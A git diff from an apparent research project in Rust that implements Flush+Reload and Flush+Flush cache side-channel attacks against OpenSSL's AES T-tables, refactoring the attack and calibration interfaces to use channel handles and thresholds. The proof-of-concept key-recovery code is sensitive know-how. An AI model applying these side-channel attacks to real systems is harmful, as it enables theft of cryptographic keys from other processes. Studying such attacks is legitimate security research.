diff --git a/aes-t-tables/src/lib.rs b/aes-t-tables/src/lib.rs index e0adf51..7752014 100644 --- a/aes-t-tables/src/lib.rs +++ b/aes-t-tables/src/lib.rs @@ -6,7 +6,7 @@ use openssl::aes; use crate::CacheStatus::Miss; use cache_side_channel::table_side_channel::TableCacheSideChannel; -use cache_side_channel::{restore_affinity, set_affinity, CacheStatus}; +use cache_side_channel::{restore_affinity, set_affinity, CacheStatus, ChannelHandle}; use memmap2::Mmap; use openssl::aes::aes_ige; use openssl::symm::Mode; @@ -54,8 +54,8 @@ const KEY_BYTE_TO_ATTACK: usize = 0; /// # Safety /// /// te need to refer to the correct t tables offset in the openssl library at path. -pub unsafe fn attack_t_tables_poc( - side_channel: &mut impl TableCacheSideChannel, +pub unsafe fn attack_t_tables_poc( + side_channel: &mut impl TableCacheSideChannel, parameters: AESTTableParams, name: &str, ) { @@ -88,7 +88,7 @@ pub unsafe fn attack_t_tables_poc( addresses.shuffle(&mut thread_rng()); - unsafe { side_channel.calibrate(addresses.clone()).unwrap() }; + let mut victims_handle = unsafe { side_channel.calibrate(addresses.clone()).unwrap() }; for addr in addresses.iter() { let mut timing = HashMap::new(); @@ -98,6 +98,8 @@ pub unsafe fn attack_t_tables_poc( timings.insert(*addr, timing); } + let mut victim_handles_ref = victims_handle.iter_mut().collect(); + for b in (u8::min_value()..=u8::max_value()).step_by(16) { eprintln!("Probing with b = {:x}", b); // fixme magic numbers @@ -113,8 +115,9 @@ pub unsafe fn attack_t_tables_poc( aes_ige(&plaintext, &mut result, &key_struct, &mut iv, Mode::Encrypt); }; - let r = - unsafe { side_channel.attack(addresses.iter(), &victim, parameters.num_encryptions) }; + let r = unsafe { + side_channel.attack(&mut victim_handles_ref, &victim, parameters.num_encryptions) + }; match r { Ok(v) => { for table_attack_result in v { diff --git a/aes-t-tables/src/main.rs b/aes-t-tables/src/main.rs index 399eb47..d871c76 100644 --- a/aes-t-tables/src/main.rs +++ b/aes-t-tables/src/main.rs @@ -1,8 +1,9 @@ #![feature(unsafe_block_in_unsafe_fn)] #![deny(unsafe_op_in_unsafe_fn)] use aes_t_tables::{attack_t_tables_poc, AESTTableParams}; +use cache_utils::calibration::Threshold; use flush_flush::naive::NaiveFlushAndFlush; -use flush_flush::{FlushAndFlush, SingleFlushAndFlush}; +use flush_flush::{FFPrimitives, FlushAndFlush, SingleFlushAndFlush}; use flush_reload::naive::*; use nix::sched::sched_setaffinity; use nix::unistd::Pid; @@ -29,8 +30,20 @@ fn main() { let te = TE_CITRON_VERT; - let mut side_channel_fr = NaiveFlushAndReload::from_threshold(220); - let mut side_channel_naiveff = NaiveFlushAndFlush::from_threshold(202); + let mut side_channel_fr = NaiveFlushAndReload::new( + Threshold { + bucket_index: 220, + miss_faster_than_hit: false, + }, + NaiveFRPrimitives {}, + ); + let mut side_channel_naiveff = NaiveFlushAndFlush::new( + Threshold { + bucket_index: 202, + miss_faster_than_hit: true, + }, + FFPrimitives {}, + ); for (index, key) in [KEY1, KEY2].iter().enumerate() { println!("AES attack with Naive F+R, key {}", index); @@ -61,8 +74,11 @@ fn main() { }; println!("AES attack with Single F+F, key {}", index); { - let (mut side_channel_ff, old, core) = - SingleFlushAndFlush::new_any_single_core().unwrap(); + let mut side_channel_ff = SingleFlushAndFlush::new( + FlushAndFlush::new_any_single_core(FFPrimitives {}) + .unwrap() + .0, + ); unsafe { attack_t_tables_poc( &mut side_channel_ff, diff --git a/cache_side_channel/src/table_side_channel.rs b/cache_side_channel/src/table_side_channel.rs index 1bb9f5e..38e805a 100644 --- a/cache_side_channel/src/table_side_channel.rs +++ b/cache_side_channel/src/table_side_channel.rs @@ -33,10 +33,10 @@ pub trait TableCacheSideChannel: CoreSpec + Debug { /// # Safety /// /// addresses must contain only valid pointers to read. - unsafe fn attack<'a, 'b, 'c>( + unsafe fn attack<'a, 'b, 'c, 'd>( &'a mut self, - addresses: impl Iterator + Clone, - victim: &'b dyn Fn(), + addresses: &'b mut Vec<&'c mut Handle>, + victim: &'d dyn Fn(), num_iteration: u32, ) -> Result, ChannelFatalError> where @@ -52,10 +52,10 @@ impl TableCacheSideChannel for T { } //type ChannelFatalError = T::SingleChannelFatalError; - default unsafe fn attack<'a, 'b, 'c>( + default unsafe fn attack<'a, 'b, 'c, 'd>( &'a mut self, - addresses: impl Iterator + Clone, - victim: &'b dyn Fn(), + addresses: &'b mut Vec<&'c mut T::Handle>, + victim: &'d dyn Fn(), num_iteration: u32, ) -> Result, ChannelFatalError> where @@ -143,24 +143,25 @@ impl TableCacheSideChannel for T { /// # Safety /// /// addresses must contain only valid pointers to read. - unsafe fn attack<'a, 'b, 'c>( + unsafe fn attack<'a, 'b, 'c, 'd>( &'a mut self, - mut addresses: impl Iterator + Clone, - victim: &'b dyn Fn(), + mut addresses: &'b mut Vec<&'c mut T::Handle>, + victim: &'d dyn Fn(), num_iteration: u32, ) -> Result, ChannelFatalError> where T::Handle: 'c, { + let mut addr_iter = addresses.iter_mut(); let mut v = Vec::new(); - while let Some(addr) = addresses.next() { + while let Some(addr) = addr_iter.next() { let mut batch = Vec::new(); - batch.push(addr); + batch.push(&mut **addr); let mut hits: HashMap<*const u8, u32> = HashMap::new(); let mut misses: HashMap<*const u8, u32> = HashMap::new(); for i in 1..T::MAX_ADDR { - if let Some(addr) = addresses.next() { - batch.push(addr); + if let Some(addr) = addr_iter.next() { + batch.push(&mut **addr); } else { break; }